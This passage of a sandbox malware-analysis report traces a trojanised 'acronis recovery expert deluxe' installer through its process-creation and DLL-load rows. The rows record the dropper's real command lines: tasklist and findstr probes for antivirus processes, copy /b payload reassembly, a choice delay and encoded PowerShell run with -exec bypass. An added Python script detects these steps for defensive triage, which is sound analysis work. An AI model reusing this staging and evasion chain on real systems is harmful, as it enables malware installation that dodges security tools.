                Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exeProcess created: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp "C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp" /SL5="$60362,17641136,845824,C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe" /VERYSILENT
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Users\user\AppData\Roaming\Panorado\electronics.exe "C:\Users\user\AppData\Roaming\Panorado\\electronics.exe" "C:\Users\user\AppData\Roaming\Panorado\\crooners.eml"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe "C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe"
                Source: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exeProcess created: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp "C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp" /SL5="$6036C,17641136,845824,C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpProcess created: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe "C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe" /VERYSILENT
                Source: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exeProcess created: C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp "C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp" /SL5="$80362,17641136,845824,C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe" /VERYSILENT
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Kill Kill.cmd & Kill.cmd
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 650429
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "GERMANY" False
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Murray + ..\Indication + ..\Institution + ..\Metres + ..\Display + ..\Cr + ..\Programming D
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\650429\Palestine.com Palestine.com D
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -ENc 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
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess created: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe "C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe"
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Kill Kill.cmd & Kill.cmd
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 650429
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Murray + ..\Indication + ..\Institution + ..\Metres + ..\Display + ..\Cr + ..\Programming D
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\650429\Palestine.com Palestine.com D
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess created: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe "C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe "C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe"
                Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exeProcess created: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp "C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp" /SL5="$50362,17641136,845824,C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe "C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe" /VERYSILENT
                Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exeProcess created: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp "C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp" /SL5="$60362,17641136,845824,C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe" /VERYSILENT
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Users\user\AppData\Roaming\Panorado\electronics.exe "C:\Users\user\AppData\Roaming\Panorado\\electronics.exe" "C:\Users\user\AppData\Roaming\Panorado\\crooners.eml"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
                Source: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exeProcess created: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp "C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp" /SL5="$6036C,17641136,845824,C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpProcess created: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe "C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe" /VERYSILENT
                Source: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exeProcess created: C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp "C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp" /SL5="$80362,17641136,845824,C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe" /VERYSILENT
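The process-creation rows above follow a fixed chain: the Kill.cmd stage pipes tasklist into findstr for security-product process names, reassembles Palestine.com with copy /b from seven fragments, uses choice /d y /t 5 as a delay and launches encoded PowerShell with -exec bypass; the Inno Setup stage repeats the discovery as tasklist /FI "IMAGENAME eq ..." | find, which is what produces the Win32_Process WMI queries with those Caption filters listed earlier. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses rows in the report's own "Source: <parent>Process created: <image> <cmdline>" layout and applies one rule per behaviour. The rule names, the "<redacted>" stand-in for the encoded PowerShell argument and the conhost row used as a negative control are this example's own.

```python
"""Triage helper for the 'Process created' rows above. Added example: not part of
the Joe Sandbox report and not code from the sample. It parses the report's own
row layout ('Source: <parent>Process created: <image> <cmdline>') and flags
what those rows show: tasklist output grepped for security-product names (the
Kill.cmd stage and the Inno Setup 'tasklist /FI "IMAGENAME eq ..."' stage),
'copy /b' reassembly of a split payload, a .com run from %TEMP%, 'choice /t'
as a sleep, and encoded PowerShell with -exec bypass. Rule names are my own."""
from __future__ import annotations
import re
from dataclasses import dataclass

# Process names the dropper looks for, taken from the findstr/find/tasklist rows.
AV_PROCESS_NAMES = {"wrsa", "opssvc", "avastui", "avgui", "bdservicehost",
                    "nswscsvc", "ekrn", "sophoshealth"}
ROW_RE = re.compile(r"^Source: (?P<parent>.*?)Process created: "
                    r"(?P<image>.*?\.(?:exe|com|tmp))\s+(?P<cmdline>.*)$", re.I)

@dataclass(frozen=True)
class Event:
    parent: str
    image: str
    cmdline: str
    @property
    def basename(self) -> str:
        return self.image.rsplit("\\", 1)[-1].lower()

def parse_row(line: str) -> Event | None:
    """One report row -> Event, or None if the row is not a process creation."""
    line = line.strip().removesuffix("Jump to behavior").rstrip()  # link residue
    m = ROW_RE.match(line)
    return Event(m["parent"], m["image"], m["cmdline"]) if m else None

def av_names(cmdline: str) -> set[str]:
    """Security-product process names mentioned anywhere on the command line."""
    low = cmdline.lower()
    return {n for n in AV_PROCESS_NAMES if n in low}

def rule_av_discovery(ev: Event):
    if ev.basename in {"tasklist.exe", "findstr.exe", "find.exe", "cmd.exe"}:
        hits = av_names(ev.cmdline)
        if hits:
            return "av_process_discovery", ",".join(sorted(hits))

def rule_copy_b_concat(ev: Event):
    # 'copy /b a + b + c target' rebuilds one file from split fragments
    m = re.search(r"\bcopy\s+/b\s+(.+)", ev.cmdline, re.I)
    if m and "+" in m.group(1):
        parts = [p.strip() for p in m.group(1).split("+")]
        return "binary_concat_staging", f"{len(parts)} fragments -> {parts[-1].split()[-1]}"

def rule_temp_com(ev: Event):
    low = ev.image.lower()
    if low.endswith(".com") and "\\appdata\\local\\temp\\" in low:
        return "com_from_temp", ev.basename

def rule_choice_sleep(ev: Event):
    if ev.basename == "choice.exe" and "/t" in ev.cmdline.lower():
        return "choice_as_sleep", ev.cmdline

def rule_encoded_powershell(ev: Event):
    if ev.basename != "powershell.exe":
        return None
    words = ev.cmdline.lower().split()
    # powershell.exe takes any unambiguous prefix: -e, -ec, -enc, -encodedcommand
    encoded = any(w[1:] and (w[1:] == "ec" or "encodedcommand".startswith(w[1:]))
                  for w in words if w.startswith("-"))
    bypass = any(len(w) >= 3 and "-executionpolicy".startswith(w) and nxt == "bypass"
                 for w, nxt in zip(words, words[1:]))
    if encoded or bypass:
        return "powershell_encoded_bypass", "+".join(
            n for n, on in (("encoded", encoded), ("exec_bypass", bypass)) if on)

RULES = (rule_av_discovery, rule_copy_b_concat, rule_temp_com,
         rule_choice_sleep, rule_encoded_powershell)

def scan(rows) -> list[tuple[str, str, Event]]:
    """Apply every rule to every parsable row -> [(rule, detail, event), ...]."""
    events = [ev for ev in map(parse_row, rows) if ev is not None]
    return [(h[0], h[1], ev) for ev in events for h in (r(ev) for r in RULES) if h]

# Sample input: rows copied from the report above. The encoded PowerShell argument
# is redacted in the report too; the final conhost row is a negative control.
SAMPLE_ROWS = r"""
Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Kill Kill.cmd & Kill.cmdJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Murray + ..\Indication + ..\Institution + ..\Metres + ..\Display + ..\Cr + ..\Programming D
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\650429\Palestine.com Palestine.com D
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -ENc <redacted>
Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
""".strip().splitlines()

if __name__ == "__main__":
    for rule, detail, ev in scan(SAMPLE_ROWS):
        print(f"{rule:26} {ev.basename:16} {detail}")
```

Run against the eleven sample rows it reports nine findings: five av_process_discovery hits (the two findstr rows and the cmd/tasklist/find triple of the Inno Setup stage), one each for the copy /b reassembly (7 fragments -> D), the .com launched from %TEMP%, the choice delay and the encoded PowerShell, and nothing for the conhost row. The same rules apply unchanged to Sysmon event 1 or EDR process-creation telemetry once the fields are mapped onto Event; the AV name list is the one the sample itself carries, so extend it for your own estate.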
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: apphelp.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: version.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: shfolder.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: wldp.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: propsys.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: riched20.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: usp10.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: msls31.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: textinputframework.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: coreuicomponents.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: coremessaging.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: ntmarta.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: wintypes.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: wintypes.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: wintypes.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: textshaping.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: profapi.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: edputil.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: urlmon.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: iertutil.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: srvcli.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: netutils.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: sspicli.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: appresolver.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: bcp47langs.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: slc.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: userenv.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: sppc.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: uxtheme.dllJump to behavior
